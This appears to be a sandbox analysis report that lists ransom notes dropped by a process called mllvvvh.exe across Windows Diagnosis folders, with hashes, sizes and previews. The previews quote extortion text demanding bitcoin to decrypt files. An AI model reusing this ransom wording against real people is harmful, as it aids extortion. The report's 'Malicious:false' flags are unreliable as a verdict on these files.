                  SHA-256:DE76D63BAB99866338E4226F46B77095EFBDAA53134D8A6FF6928C901A6966B9
                  SHA-512:06D6C4A3B6D94DC7C2DA12525DD9D81E66A48418DBE510FDDCA50085240176DCBE34FFE050AAF949ABA89164B1561508D83B6545106ACBDFB2C046081F632D01
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Diagnosis\CustomTraceProfiles\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Diagnosis\CustomTraceProfiles\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  C:\ProgramData\Microsoft\Diagnosis\CustomTraceProfiles\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Diagnosis\DownloadedScenarios\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Diagnosis\DownloadedScenarios\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  C:\ProgramData\Microsoft\Diagnosis\DownloadedScenarios\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Diagnosis\DownloadedSettings\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Diagnosis\DownloadedSettings\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  C:\ProgramData\Microsoft\Diagnosis\DownloadedSettings\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Diagnosis\ETLLogs\AutoLogger\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Diagnosis\ETLLogs\AutoLogger\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  C:\ProgramData\Microsoft\Diagnosis\ETLLogs\AutoLogger\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Diagnosis\ETLLogs\ScenarioShutdownLogger\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Diagnosis\ETLLogs\ScenarioShutdownLogger\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  C:\ProgramData\Microsoft\Diagnosis\ETLLogs\ScenarioShutdownLogger\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Diagnosis\ETLLogs\ShutdownLogger\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Diagnosis\ETLLogs\ShutdownLogger\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  C:\ProgramData\Microsoft\Diagnosis\ETLLogs\ShutdownLogger\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Diagnosis\ETLLogs\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62848
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkL
                  MD5:D8CEF461F8767D26948B8CD44CECF2E1
                  SHA1:537908FB65BAE7EB3C5917D9C5171D46522FEB18
                  SHA-256:017AD361A67C719BC8F05AB012CDC366912ABE6317853590F3979FA2C45D2E2D
                  SHA-512:778B6C27BF28FA4392F2C48FCE603FBF3192BFA548FA257AF0EAD3E9BA3FDA8A971EFC046CCF7DA389D78892E40313B4393A0469E0849880B9509570608C5235
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Diagnosis\ETLLogs\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCP
                  MD5:D6D12315C5392CB85E511974AE2BB7B4
                  SHA1:3B57D3392D90430B7B2423E566C4B3C64A3BA6FC
                  SHA-256:24E1941631CF2BD3A856BF94D4783325266D10E44EFD067B2E988780B8531916
                  SHA-512:9AEE5774C57BC36CA31E8053E17D287282C30B4077197D07A4EE91443C9DF31FA28AC93B5D5684E463647C8B317C15B8E2757D4C7AE38ABFE471CDB934FEF21F
                  Malicious:false
                  C:\ProgramData\Microsoft\Diagnosis\ETLLogs\help_recover_instructions+fnc.txt
